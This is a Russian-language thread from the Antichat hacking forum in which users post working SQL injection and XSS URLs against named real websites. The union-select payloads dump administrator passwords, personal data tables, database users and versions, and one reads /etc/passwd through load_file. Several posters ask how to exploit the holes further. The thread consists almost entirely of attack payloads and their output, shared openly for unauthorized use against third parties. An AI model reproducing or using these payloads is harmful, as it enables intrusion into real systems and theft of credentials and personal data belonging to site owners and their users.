ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11601  
Старый 20.03.2010, 04:10
Аватар для Dr..VATSON
Dr..VATSON
Новичок
Регистрация: 07.12.2008
Сообщений: 12
Провел на форуме:
487591

Репутация: 43
По умолчанию

Код:
http://jobmillion.com/en/member/detail-job.php?action=showlist&ID=-10+union+select+1,2,3,4,5,6,7,8,group_concat%28million_system_staff_Password%29,group_concat%28million_system_staff_UserName%29,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+million_system_staff%20--

Из таблицы million_system_staff

В Ы В О Д И Т С Я

million_system_staff_ID
million_system_staff_Name
million_system_staff_Email
million_system_staff_UserName
million_system_staff_Password
million_system_staff_CreateByID
million_system_staff_CreateBy
million_system_staff_CreateDate
million_system_staff_LastLoginDate
million_system_staff_Status
million_system_staff_Level


А Д М И Н К А

http://jobmillion.com/stats



Код:
http://www.infowomen.org/portfolio/clc/web_app/admin/job.php?job_id=-1+union+select+group_concat%28column_name%29+from+information_schema.columns+where+table_name=char%28116,98,108,95,112,101,114,115,111,110,115%29%20--

Из таблицы tbl_persons

В Ы В О Д И Т С Я

person_id
first_name
last_name
client_id
job_id
email_address
password
y_n_recipient


А Д М И Н К А

http://www.infowomen.org/admin


ТИЦ = 10

5.1.26-rc

AVTOTYRE@localhost



Код:
http://www.avto-tyre.ru/shop.php?id=-27+union+select+1,2,group_concat%28column_name%29,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.columns+where+table_name=char%2897,100,100,114,101,115,115%29%20--
Из таблицы address

address_id
user_id
name
index
region
city
street
telephon
info
address_id
user_id
index
region
district
city
name
telephon
fax
street
house
building
stroenie
flat
entrance
floor
code
info

Последний раз редактировалось Dr..VATSON; 20.03.2010 в 16:31..
 
Ответить с цитированием

  #11602  
Старый 20.03.2010, 19:40
Аватар для CyberHunter
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Код:
http://www.brain-tumor.org/?id=-11+union+select+1,concat%28user%28%29,version%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+
Цитата:
> btc_admin@localhost5.0.22btc
 
Ответить с цитированием

  #11603  
Старый 21.03.2010, 00:56
Аватар для Darren
Darren
Banned
Регистрация: 14.06.2008
Сообщений: 34
Провел на форуме:
119183

Репутация: 13
Отправить сообщение для Darren с помощью ICQ
По умолчанию

http://www.accessoriescoop.com/products.php?cid=49/**/and/**/1=2/**/union/**/select/**/1,version(),3,4/*

4.1.22-standard

Не смог подобрать названия таблиц, стыдно конечно (. Как можно заюзать такие скули? Help somebody
 
Ответить с цитированием

  #11604  
Старый 21.03.2010, 01:30
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.naregatsi.org/new/arm/events/up_events_details.php?event_id=1+and+1=0+union+sel ect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26,27,28

version() 5.1.45-log
user() naregats_tigran@localhost
database() naregats_naregatsi

+ XSS

http://www.naregatsi.org/new/arm/events/up_events_details.php?event_id=1+and+1=0+union+sel ect+1,2,3,4,5,<img src=http://forum.antichat.ru/antichat/pic/logo.gif width=500 hegth=800></img>,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28
 
Ответить с цитированием

  #11605  
Старый 21.03.2010, 16:37
Аватар для SEWERN
SEWERN
Участник форума
Регистрация: 09.01.2009
Сообщений: 155
Провел на форуме:
2253612

Репутация: 94
По умолчанию

http://surediamond.com/product.php?disproid=53+union+select+1,2,version() ,4,5--
можно ли както раскрутить дальше ? подскажите в пм , спс.

Последний раз редактировалось SEWERN; 21.03.2010 в 16:43..
 
Ответить с цитированием

  #11606  
Старый 21.03.2010, 20:12
Аватар для root_sashok
root_sashok
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
Провел на форуме:
8220635

Репутация: 1593


Отправить сообщение для root_sashok с помощью ICQ
По умолчанию

Код:
http://www.che-esche.com/fullafisha.php?id=-1+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15
Код:
http://thedivinemercy.org/news/department.php?PLID=-72+union+select+1,user(),version(),4,5/*
Код:
http://www.ktcomputer.de/start.php?kat=news&kat_id=-1+union+select+1,2,3,4,5,6,7,8,version(),user(),11,12,13,14,15,16,17--
Первые SQL-ы, практикуюсь
 
Ответить с цитированием

  #11607  
Старый 21.03.2010, 23:38
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.revues-plurielles.org/php/index.php?nav=revue&no=17+union+select+1,2,3,4,5

OS -Windows NT

user() revues-plu-admin@localhost
version() 5.0.21-community-nt
database() revues-plurielles

+ XSS

http://www.revues-plurielles.org/php/index.php?nav=revue&no="><script>alert('ANTICHAT') </script>
 
Ответить с цитированием

  #11608  
Старый 22.03.2010, 00:49
Аватар для root_sashok
root_sashok
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
Провел на форуме:
8220635

Репутация: 1593


Отправить сообщение для root_sashok с помощью ICQ
По умолчанию

Код:
http://www.zeltarasa.com/?lang=ru&id=1+union+select+1,concat_ws(0x3a,user(),database(),version())+--
Код:
http://www.fotomundo.com/nota.php?id=-1+union+select+1,2,3,4,version(),user(),7,database(),9,10,11,12,13,14,15--
Код:
http://krasuis.ru/inset/foto.php?id=1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4--
Код:
http://www.provisor.com.ua/news.php?art=-1+union+select+1,2,3,4,5,6,7,user(),version(),database()--
Код:
http://www.boxclever.ca/news.php?id=-1+union+select+version(),2,user(),database(),5+--+
Код:
http://www.ekomtech.kiev.ua/a-news/news.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9--
Код:
http://shepherdpost.christianpost.com/mainbox/news.php?cat=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9+--+
Здесь можно посмотреть таблицы:
Код:
http://shepherdpost.christianpost.com/mainbox/news.php?cat=-1+union+select+1,2,3,table_name,5,6,7,8,9+from+information_schema.tables+--
Код:
http://dev.ultimareplenisher.com/news.php?id=-1+union+select+concat_ws(0x3a,user(),database(),version()),2--
Код:
http://www.kpbptpn.co.id/news.php?lang=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13--
Код:
http://views24hours.com/view24hours/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9--
Здесь вывод в самом низу, справа.
Код:
http://www.tagittins.co.uk/news.php?id=-1+union+select+1,user(),3,database(),5,6,7,8,9--
Код:
http://avto-tire.ru/item_view.php?id=&item_id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14,15,16,17+--+
Здесь 54 таблицы, последняя:
Код:
http://avto-tire.ru/item_view.php?id=&item_id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.tables+limit+54,1--+
Код:
http://www.ctaholidays.net/beta/holiday_details.php?id=-1+union+select+1,2,3,4,5,6,7,user(),9,10,11,12,13,14,database()--

Последний раз редактировалось root_sashok; 22.03.2010 в 19:46..
 
Ответить с цитированием

  #11609  
Старый 22.03.2010, 15:41
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

Цитата:
http://www.ksds.edu/community/holidays.php?hid=40+order+by+6/*
User: scully@localhost
Version: 4.1.22-log
Dbname: scully

есть таблица мемберс
 
Ответить с цитированием

  #11610  
Старый 22.03.2010, 17:23
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.diffusion.ens.fr/index.php?res=themes&idtheme=30+and+1=0+union+sele ct+1,2,3,concat(user,char(58),password),5,6+from+m ysql.user--

OS - Debian GNU/Linux

user() : root@localhost

version() : 4.0.24_Debian-10sarge1-log

database() : ens_data


robots.txt:

User-agent: *
Disallow: /chbpascal/
Disallow: /college/video_college
Disallow: /college/photos
Disallow: /college/vignettes
Disallow: /college/en/video_college
Disallow: /college/en/photos
Disallow: /college/en/vignettes
Disallow: /en/audio
Disallow: /en/bonus
Disallow: /en/photos
Disallow: /en/video
Disallow: /en/video_stream
Disallow: /en/vignettes
Disallow: /pear
Disallow: /photos
Disallow: /administration
Disallow: /vignettes
Disallow: /college2
Disallow: /video
Disallow: /audio
Disallow: /video_stream
Disallow: /bonus

/etc/passwd

http://www.diffusion.ens.fr/index.php?res=themes&idtheme=30+and+1=0+union+sele ct+1,2,3,load_file(CHAR(47,101,116,99,47,112,97,11 5,115,119,100)),5,6+from+mysql.user--



+XSS

http://www.diffusion.ens.fr/index.php?res=themes&idtheme=30+and+1=0+union+sele ct+1,2,3,<img src=http://img525.imageshack.us/img525/7127/matrixic9.jpg></img>,5,6--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ